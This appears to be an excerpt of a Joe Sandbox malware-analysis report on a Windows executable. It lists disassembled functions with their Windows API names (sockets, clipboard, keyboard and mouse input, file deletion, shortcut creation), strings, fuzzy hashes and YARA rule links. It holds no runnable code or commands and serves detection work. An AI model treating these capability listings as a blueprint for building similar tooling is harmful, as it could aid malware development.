                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                            • String ID:
                                                            • API String ID: 2762341140-0
                                                            • Opcode ID: 3f2bc404d53d5998161f0ee2b8df4f9bc3160e202cb50a098f9587f0d2c0f7e1
                                                            • Instruction ID: 0c5639d5e23ae2560b2bdb97cafb03b1edf5f1f5faa888ec25dddd9a3c0359f2
                                                            • Opcode Fuzzy Hash: 3f2bc404d53d5998161f0ee2b8df4f9bc3160e202cb50a098f9587f0d2c0f7e1
                                                            • Instruction Fuzzy Hash: EDC16BBAB04B85C5EB14EF6AE8842ADB7A0FB88B94F854036DE4E47765CF38D445C311
                                                            Function 00007FF7EC18C5FC Relevance: 16.7, APIs: 11, Instructions: 166COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            • API String ID: 1255039815-0
                                                            • Opcode ID: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                            • Instruction ID: 88382fa3e926f79fd2e69063411c55c74e189c6a71e68bef78a3a2a83ea30dc7
                                                            • Opcode Fuzzy Hash: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                            • Instruction Fuzzy Hash: 376191ABB08A5186EB10EF61E9507AC77B4FB44B88B848037DE0E57799DF38D445C362
                                                            Function 00007FF7EC1A59D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                            • Instruction ID: 685abb5e91205b24053eeebd0fe36921352bf72930cfbe22db320da2267efcb0
                                                            • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                            • Instruction Fuzzy Hash: 2A415EAAB08A46D5EB14AB65E4803BCA771FB88B94F884433CA0D43755DF38E595C321
                                                            Function 00007FF7EC1B6C34 Relevance: 15.3, APIs: 10, Instructions: 296fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID:
                                                            • API String ID: 2395222682-0
                                                            • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                            • Instruction ID: d4e81235088d5248a2094742a6730dfe257afe8ea6a28b0d85d483cc0b6df55c
                                                            • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                            • Instruction Fuzzy Hash: 4DD16DBAB08B46C6EB14EF65E4402ACA3A1FB98B88B904037DE4D57B58DF38D445C761
                                                            Function 00007FF7EC1CA59C Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            • Opcode ID: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                            • Instruction ID: c47b346d344d5e5c9e6a4987f11b37f3a2174a8d94b0ef6d838dc6f1fd7864f0
                                                            • Opcode Fuzzy Hash: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                            • Instruction Fuzzy Hash: C371D1BA614A8186E720DF65E884BED7760FB89B95F900033EA4D47BA4CF3CD156C711
                                                            Function 00007FF7EC1B0D24 Relevance: 15.1, APIs: 10, Instructions: 86clipboardmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                            • Instruction ID: 78809b890140bd1fe5d2ce17e04912b857716de250f0a9b07cab4a171f56c3b8
                                                            • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                            • Instruction Fuzzy Hash: BA414DEAA08642C2EB14AF16E494378B760FF54B86F858436DA4E07796CF7CE041C726
                                                            Function 00007FF7EC162650 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                            • String ID: ?
                                                            • API String ID: 500310315-1684325040
                                                            • Opcode ID: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                            • Instruction ID: 6a112aef7d5aad18f8276eb7bc9a700037b82a97d1ba63f9c17dafa2888bccee
                                                            • Opcode Fuzzy Hash: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                            • Instruction Fuzzy Hash: FC618EBAA0864286E750EF25E8417A9F7A8FF48788FD40137EA0D42795DF3CD441C762
                                                            Function 00007FF7EC1B3940 Relevance: 12.1, APIs: 8, Instructions: 116networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                            • String ID:
                                                            • API String ID: 540024437-0
                                                            • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                            • Instruction ID: f0bd50af904fed07349deb8e89d35b31037377ad724ea7860a010eea5a4a16f0
                                                            • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                            • Instruction Fuzzy Hash: 4D4180EAA08682C6EB14BF26E44036CA760FB85BA4F954532DA5E47792CF3CE151C721
                                                            Function 00007FF7EC1B8360 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 331COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 0-572801152
                                                            • Opcode ID: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                            • Instruction ID: 4cceaff9e95ce5065d04fd74ecffa235925d0e3fc96043350d26db830ad39821
                                                            • Opcode Fuzzy Hash: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                            • Instruction Fuzzy Hash: B6E190BAA08B82C6EB10EF65E4403ADB7A0FB84B98F804136DE4D57B94DF38D555CB11
                                                            Function 00007FF7EC198E18 Relevance: 10.6, APIs: 7, Instructions: 145windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                            • Instruction ID: 3aece7abcf0f8eaade6aa4fa65e9763a1d96e9fcae8a46deee4a0f6a339c5d0c
                                                            • Opcode Fuzzy Hash: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                            • Instruction Fuzzy Hash: 3251D196A0C2D111F771AB757110B7DAF62FB46BC4F8880F6DA8907E46CA38E454C332
                                                            Function 00007FF7EC19BC70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                            • Instruction ID: ffc6ceceb7342ceaeda10d759d65e92049c861069a96e301ca6bcdb939daf7db
                                                            • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                            • Instruction Fuzzy Hash: 2A41C2AAA28A82D2EA50FB14F8403ADE361FF80794FD01073EA5E03699DF7CD505C761
                                                            Function 00007FF7EC1B4C58 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                            • String ID:
                                                            • API String ID: 383626216-0
                                                            • Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                            • Instruction ID: 33fad741738b52b8cafc40cccf2e12e6abf0c856c9feb95116e26fd196465d4a
                                                            • Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                            • Instruction Fuzzy Hash: 6A31D6B7B046528BE314EF65E4407EC77A1FB88748F804236EE0A53A84DF38E545CB50
                                                            Function 00007FF7EC15AF58 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                            • Instruction ID: 9ad05d37a10a9c7d7618f912f73b18396128dab39c2103e5d9e6e601c420afed
                                                            • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                            • Instruction Fuzzy Hash: 8B31927A608B8185EB20DF24F8403ADB7A4FB84755F900136EA9D47B99DF3CC145CB11
                                                            Function 00007FF7EC1AA874 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118filesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                            • String ID: *.*
                                                            • API String ID: 1927845040-438819550
                                                            • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                            • Instruction ID: 528d88e2073d6f13bd998092febb952923345880fd36ec971563365ea5569436
                                                            • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                            • Instruction Fuzzy Hash: 1951C16A608B8285EB10EB15F8403ADA7B0FB45794F940133DE5D03799DF3CE959CB22
                                                            Function 00007FF7EC12BE70 Relevance: 8.6, Strings: 6, Instructions: 1141COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                            • API String ID: 0-2187161917
                                                            • Opcode ID: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                            • Instruction ID: b7eb724a8d6d23e8d6fda8aeafd73de3f591d06d559076e8e5e0df423df1066b
                                                            • Opcode Fuzzy Hash: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                            • Instruction Fuzzy Hash: ECB2C5BAE08691CAFB249F64A4107BDB7A1FB44788F904137EA4D57B84DF38E841D712
                                                            Function 00007FF7EC1B4074 Relevance: 7.6, APIs: 5, Instructions: 148networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 4170576061-0
                                                            • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                            • Instruction ID: 6a6ec68670590f297b2ea0fa50f9d4dd05e4a08a574efdd4fa0f586083f54746
                                                            • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                            • Instruction Fuzzy Hash: F751B2AAB08652C1DB14FB16F4047A9AB90BB89FE4FC58532DE5E07796CE3CD500C791
                                                            Function 00007FF7EC1A6D04 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 308comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize
                                                            • String ID: .lnk
                                                            • API String ID: 948891078-24824748
                                                            • Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                            • Instruction ID: d34ed836470d315109bc9153de7c81b408bceb09b2fb9250feddb19d05884926
                                                            • Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                            • Instruction Fuzzy Hash: 5DD192AAB18B4681EB14FB15E4907EDAB60FB80BC8F805032EE4E47B65EE3CD545C751
                                                            Function 00007FF7EC15793C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: !$VUUU$fmod
                                                            • API String ID: 1757819995-2579133210
                                                            • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                            • Instruction ID: 963011008aeaf6100f1425a6521bccc16e413b4ac0efe0fb177942a991606725
                                                            • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                            • Instruction Fuzzy Hash: 4DB11865E2CFC545D6A39A3860013B6F259AFAA390F54C333EA5E35BA0DF3C9582C741
